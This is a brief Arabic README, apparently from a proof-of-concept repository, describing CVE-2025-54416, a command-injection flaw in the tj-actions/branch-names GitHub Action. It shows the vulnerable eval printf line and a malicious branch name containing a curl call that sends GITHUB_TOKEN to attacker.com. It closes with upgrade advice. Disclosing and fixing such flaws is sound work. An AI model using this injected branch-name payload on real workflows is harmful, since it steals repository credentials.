
PoC لثغرة حقن الأوامر CVE-2025-54416 في tj-actions/branch-names
يُوضح هذا المستودع CVE-2025-54416، وهي ثغرة حرجة في حقن الأوامر في tj-actions/branch-names تؤثر على أكثر من 5,000 مستودع عام.
يستخدم إجراء GitHub tj-actions/branch-names (الإصدارات <= 8.2.1) نمط eval printf "%s" غير الآمن، مما يعيد تقديم مخاطر حقن الأوامر بعد التنقية السليمة.
# Vulnerable code pattern in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
tj-actions/[email protected] لاستخراج اسم الفرعاسم الفرع: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
عند تشغيل سير العمل:
echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN
قم بالتحديث إلى tj-actions/branch-names@v9 أو إصدار أحدث، والذي يستبدل eval printf "%s" باستدعاءات printf آمنة.